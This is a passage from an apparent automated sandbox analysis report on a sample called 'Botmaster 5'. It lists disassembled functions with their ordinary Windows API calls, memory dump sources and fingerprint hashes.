                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: fseek
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 623662203-0
                                                                                                                                                                                                                  • Opcode ID: dd19ad0792b72bbca382d896fb99a20ac0a02df5a949a334d1d46f6d38307d77
                                                                                                                                                                                                                  • Instruction ID: 604c482f6663a5021e751272107a91423f7667b976c491b07d03adc7605c9884
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd19ad0792b72bbca382d896fb99a20ac0a02df5a949a334d1d46f6d38307d77
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DF0DAB16143016BD664DA7CC889F7B77D8ABC8311F081E2DB498C2394E729D8849A26
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041C006 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateDirectorywcslenwcsncpy
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 961886536-0
                                                                                                                                                                                                                  • Opcode ID: 32b9713f1210cd60ef9bb5e0958140beb0def9e990c2cc2a56eac426b9a0861e
                                                                                                                                                                                                                  • Instruction ID: c575e52156a52ed4e5164f87275b3e8cef1d4ae592f0844321a8428a554ca30e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32b9713f1210cd60ef9bb5e0958140beb0def9e990c2cc2a56eac426b9a0861e
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5201F9B2850208D6CF24DBE4CC89FDA77B8EB14304F6080A7D515D2091E7BD9EC8D75A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004220F6 Relevance: 4.5, APIs: 3, Instructions: 34windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000407,00000000,00000000), ref: 00422115
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000407,00000001,00000000), ref: 0042213A
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000406,00000000), ref: 00422144
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                  • Opcode ID: 4966340711df4d3f514d03c0d3d597bd26f30c2d2980f3ea3d9bfe90cf9ace40
                                                                                                                                                                                                                  • Instruction ID: 6680de045753f599a664fcfa7c9ef89d6723b1d9b5b5b813d20d5378aef551c7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4966340711df4d3f514d03c0d3d597bd26f30c2d2980f3ea3d9bfe90cf9ace40
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42F0D076A40219FBEF214E41DC01FA67F6AEB447A0F118021FB443A1A0C6F16821DF99
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040F109 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040F116
                                                                                                                                                                                                                  • InitCommonControlsEx.COMCTL32(00000000,00001000), ref: 0040F130
                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0040F138
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CommonControlsInitInitializememset
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2179856907-0
                                                                                                                                                                                                                  • Opcode ID: b400d066d247f48d92530226d64b084b7f5c197f9227f0543e6c0fdf752f4640
                                                                                                                                                                                                                  • Instruction ID: ed34baa9df9e2578f858b53e15805d49eef9ebdd02f8cb020f02b50e585ca46c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b400d066d247f48d92530226d64b084b7f5c197f9227f0543e6c0fdf752f4640
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50E0ECB1900208BBEB40DBD0EC0AF8DBBBCAB04709F404065E204E61C0EBF4A6488766
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00425A74 Relevance: 3.1, APIs: 2, Instructions: 119COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: localtimemktime
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3641417603-0
                                                                                                                                                                                                                  • Opcode ID: 71725d8f97e50dea9c286cb31257f6ef85968f65b5ea022df3796f90c3cc70e2
                                                                                                                                                                                                                  • Instruction ID: 9f8eb1a228f0bd7bed15c58b0a76ec6d1f208596d8dd5408c853812b1be73a0c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71725d8f97e50dea9c286cb31257f6ef85968f65b5ea022df3796f90c3cc70e2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2541C532F016298BCF24DF5CE4816DEBBA5EB14310FA48127E910E7291E338ED50CB99
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040C6A4 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,0040AED3,00000002,00000000,00402189,00000000,00000000,DFA), ref: 0040C6C3
                                                                                                                                                                                                                    • Part of subcall function 004299B0: RtlAllocateHeap.NTDLL(00990000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299D6
                                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 0040C6FD
                                                                                                                                                                                                                    • Part of subcall function 00429950: wcslen.MSVCRT ref: 00429963
                                                                                                                                                                                                                    • Part of subcall function 004295C0: CharUpperW.USER32(00000000,00000000,?,?,?,?,?,00000000,0040C734,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00429610
                                                                                                                                                                                                                    • Part of subcall function 004299B0: HeapReAlloc.KERNEL32(00990000,00000000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299F9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$AllocAllocateCharFolderFromListLocationPathSpecialUpperwcslen
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3085956889-0
                                                                                                                                                                                                                  • Opcode ID: 1d1eedf09a2ea40eb979802d2cac931e19fbb35f4f805f8c3b0d4206865ba8de
                                                                                                                                                                                                                  • Instruction ID: ed15cdf679d2123bb3d7e2d5eb2ed5f06eea7acc14f464929505c26da578fb08
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d1eedf09a2ea40eb979802d2cac931e19fbb35f4f805f8c3b0d4206865ba8de
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D112EB2204201AFD701EB61EC81D6B77EDFF44314F40842EF688C6221E7789C909BAA
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00406176 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 004299B0: RtlAllocateHeap.NTDLL(00990000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299D6
                                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,0000001A,00000000,00000000,00000104,00000000,00000000,00000000,00000000,0040987D,00000000,00000001,00000000,00000000,00000000,?), ref: 004061B4
                                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 004061C1
                                                                                                                                                                                                                    • Part of subcall function 00429950: wcslen.MSVCRT ref: 00429963
                                                                                                                                                                                                                    • Part of subcall function 004299B0: HeapReAlloc.KERNEL32(00990000,00000000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299F9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$AllocAllocateFolderFromListLocationPathSpecialwcslen
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1484742105-0
                                                                                                                                                                                                                  • Opcode ID: bae9bc9d1300abcf6ba3a22001abf7d31942c0730a7f4307e060655ca416ac52
                                                                                                                                                                                                                  • Instruction ID: 7d4a24b2285f0c827129a8d82053b3c571bc0fcaa59b4c930afaed95f560345f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bae9bc9d1300abcf6ba3a22001abf7d31942c0730a7f4307e060655ca416ac52
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02112EF1604211AFD715EB51FC42A2A77ACFB54314F44882FF284C6261D7B89C80CBAA
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00406259 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 004299B0: RtlAllocateHeap.NTDLL(00990000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299D6
                                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000023,00000000,00000000,00000104,00000000,00000000,00000000,00000000,004098C2,00000000,00000001,00000000,00000000,00000000,?), ref: 00406297
                                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 004062A4
                                                                                                                                                                                                                    • Part of subcall function 00429950: wcslen.MSVCRT ref: 00429963
                                                                                                                                                                                                                    • Part of subcall function 004299B0: HeapReAlloc.KERNEL32(00990000,00000000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299F9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$AllocAllocateFolderFromListLocationPathSpecialwcslen
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1484742105-0
                                                                                                                                                                                                                  • Opcode ID: 3de4f274a48d160ac856e7c186ab54c2cc5f0b7484ba69ec15588cdf22c91ad1
                                                                                                                                                                                                                  • Instruction ID: 88be309fe31ecc67859f6bb57e244dfe8977bad481acc6ddc67cdf333e52502d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3de4f274a48d160ac856e7c186ab54c2cc5f0b7484ba69ec15588cdf22c91ad1
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA112EF1604211AFE715EB51FC42E2A77ADEB44318F44842FF644C6261D7B89C94CBAA
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040641F Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 004299B0: RtlAllocateHeap.NTDLL(00990000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299D6
                                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000019,00000000,00000000,00000104,00000000,00000000,00000000,00000000,00409838,00000000,00000001,00000000,00000000,00000000,?), ref: 0040645D
                                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 0040646A
                                                                                                                                                                                                                    • Part of subcall function 00429950: wcslen.MSVCRT ref: 00429963
                                                                                                                                                                                                                    • Part of subcall function 004299B0: HeapReAlloc.KERNEL32(00990000,00000000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299F9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$AllocAllocateFolderFromListLocationPathSpecialwcslen
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1484742105-0
                                                                                                                                                                                                                  • Opcode ID: fb1b13b9b89d9fba1ce083ce22914e2ddae8abaf57d57f0b9f57eec2ea059d95
                                                                                                                                                                                                                  • Instruction ID: 1a1fa6e01ccacee007ee15739fca046c9e028d866da00ddea5ed35547f5d6c72
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb1b13b9b89d9fba1ce083ce22914e2ddae8abaf57d57f0b9f57eec2ea059d95
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1111CF1604211AFD715EB51FC42A2A77ACEB44314F44842EF254C6262D7B89C84DBAE
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004066C8 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 004299B0: RtlAllocateHeap.NTDLL(00990000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299D6
                                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000005,00000000,00000000,00000104,00000000,00000000,00000000,00000000,0040969A,00000000,00000001,00000000,00000000,00000000,?), ref: 00406706
                                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 00406713
                                                                                                                                                                                                                    • Part of subcall function 00429950: wcslen.MSVCRT ref: 00429963
                                                                                                                                                                                                                    • Part of subcall function 004299B0: HeapReAlloc.KERNEL32(00990000,00000000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299F9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$AllocAllocateFolderFromListLocationPathSpecialwcslen
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1484742105-0
                                                                                                                                                                                                                  • Opcode ID: 93136bf729aae372259bd5b3791a856a36cc202c85b50d9cdb5d51c6361e520d
                                                                                                                                                                                                                  • Instruction ID: 71c45b7fbf61636053186e55a823707644f994862d0f791ab36289eadf702b86
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93136bf729aae372259bd5b3791a856a36cc202c85b50d9cdb5d51c6361e520d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC112EF1604211AFD715EB51EC42E2A77ACEB44314F44842FF244C6261E7B89C80CFAA
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004067AB Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 004299B0: RtlAllocateHeap.NTDLL(00990000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299D6
                                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,0000002E,00000000,00000000,00000104,00000000,00000000,00000000,00000000,004096DF,00000000,00000001,00000000,00000000,00000000,?), ref: 004067E9
                                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 004067F6
                                                                                                                                                                                                                    • Part of subcall function 00429950: wcslen.MSVCRT ref: 00429963
                                                                                                                                                                                                                    • Part of subcall function 004299B0: HeapReAlloc.KERNEL32(00990000,00000000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299F9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$AllocAllocateFolderFromListLocationPathSpecialwcslen
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1484742105-0
                                                                                                                                                                                                                  • Opcode ID: 46aea6bc3a85f16bcbaf90a74766d4fb977f5f9522373db905cb7329af12103b
                                                                                                                                                                                                                  • Instruction ID: 13bb68f7f9583b8e9a12a99c652f1113855c79a213c16394ec41abe0dac14e52
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46aea6bc3a85f16bcbaf90a74766d4fb977f5f9522373db905cb7329af12103b
